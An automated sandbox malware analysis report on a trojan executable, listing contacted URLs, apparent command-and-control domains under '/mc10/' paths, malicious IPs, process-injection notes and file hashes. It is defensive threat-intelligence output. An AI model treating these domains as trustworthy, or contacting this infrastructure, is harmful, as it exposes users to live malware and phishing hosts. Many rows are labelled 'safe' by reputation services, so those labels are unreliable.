            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
            http://www.shophansler.comReferer: | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.sajatypeworks.com | 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.founder.com.cn/cn/cThe | 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.at89v2.com/mc10/www.sainikshiksha.com | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.sainikshiksha.com/mc10/ | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
            http://www.kurainu.xyz | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark | explorer.exe, 00000004.00000000.1703761960.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
            http://www.dealerxai.com/mc10/www.bjcysadz.xyz | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.galapagosdesign.com/DPlease | 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000004.00000000.1707756779.000000000C893000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.urwpp.deDPlease | 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.zhongyicts.com.cn | 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.motolimod.com/mc10/www.at89v2.com | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
            https://wns.windows.com/L | explorer.exe, 00000004.00000000.1707756779.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4153126684.000000000C557000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.291van.fun | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | 2%, Virustotal; Avira URL Cloud: safe | unknown
            http://www.fondsa.xyz | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.llngx.com/mc10/www.ajansyapai.net | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://word.office.com | explorer.exe, 00000004.00000002.4153126684.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707756779.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.sainikshiksha.com/mc10/www.fondsa.xyz | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.ajansyapai.net/mc10/www.tatesfluffyfrenchies.com | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | explorer.exe, 00000004.00000000.1703761960.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.zaki-argan.comReferer: | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win | explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.tatesfluffyfrenchies.com/mc10/ | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://schemas.micr | explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.thecollisionmagazine.com/mc10/ | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow- | explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.carterandcone.coml | 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu | explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.dealerxai.com | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.fontbureau.com/designers/frere-user.html | 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.shophansler.com/mc10/: | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark | explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.motolimod.com/mc10/ | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.sainikshiksha.comReferer: | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://www.rd.com/list/polite-habits-campers-dislike/ | explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://android.notify.windows.com/iOS | explorer.exe, 00000004.00000002.4153126684.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707756779.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.tatesfluffyfrenchies.com/mc10/www.dealerxai.com | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: phishing | unknown
            http://www.thecollisionmagazine.comReferer: | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | explorer.exe, 00000004.00000000.1703761960.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.basedawgz.liveReferer: | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://outlook.com_ | explorer.exe, 00000004.00000002.4153126684.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707756779.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe | explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at | explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.fontbureau.com/designersG | 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://schemas.mi | explorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.fontbureau.com/designers/? | 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.founder.com.cn/cn/bThe | 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.zaki-argan.com/mc10/ | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.huttonsidel.onlineReferer: | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.fontbureau.com/designers? | 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl | explorer.exe, 00000004.00000002.4143507586.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.at89v2.com | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://powerpoint.office.comcember | explorer.exe, 00000004.00000002.4153126684.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707756779.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.motolimod.comReferer: | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.kurainu.xyzReferer: | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.bjcysadz.xyzReferer: | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.llngx.comReferer: | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.tiro.com | 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re- | explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.291van.fun/mc10/www.motolimod.com | explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.sakkal.comne | 8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703686104.0000000005690000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.goodfont.co.kr8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.kurainu.xyz/mc10/explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.microexplorer.exe, 00000004.00000000.1706494215.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1704923328.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.1704462653.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.typography.netD8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.llngx.comexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.galapagosdesign.com/staff/dennis.htm8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.bjcysadz.xyz/mc10/www.zaki-argan.comexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://api.msn.com/qexplorer.exe, 00000004.00000003.3114554074.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.291van.funReferer:explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.kurainu.xyz/mc10/www.291van.funexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.tatesfluffyfrenchies.comReferer:explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.fonts.com8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
103.224.212.213 | www.at89v2.com | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | true
188.114.97.3 | www.291van.fun | European Union | 13335 | CLOUDFLARENETUS | true
3.64.163.50 | unknown | United States | 16509 | AMAZON-02US | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1470721
Start date and time: 2024-07-10 12:08:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 6s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: 8tvMmyxveyzFcnJ.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@285/1@14/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 118
• Number of non-executed functions: 327
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing behavior information
• Report size getting too big: too many NtEnumerateKey calls found
• Report size getting too big: too many NtOpenKey calls found
• Report size getting too big: too many NtOpenKeyEx calls found
• Report size getting too big: too many NtQueryValueKey calls found
Time | Type | Description
06:09:00 | API Interceptor | 1x Sleep call for process: 8tvMmyxveyzFcnJ.exe modified
06:09:09 | API Interceptor | 8917497x Sleep call for process: explorer.exe modified
06:09:45 | API Interceptor | 8330821x Sleep call for process: netsh.exe modified
Process: C:\Users\user\Desktop\8tvMmyxveyzFcnJ.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
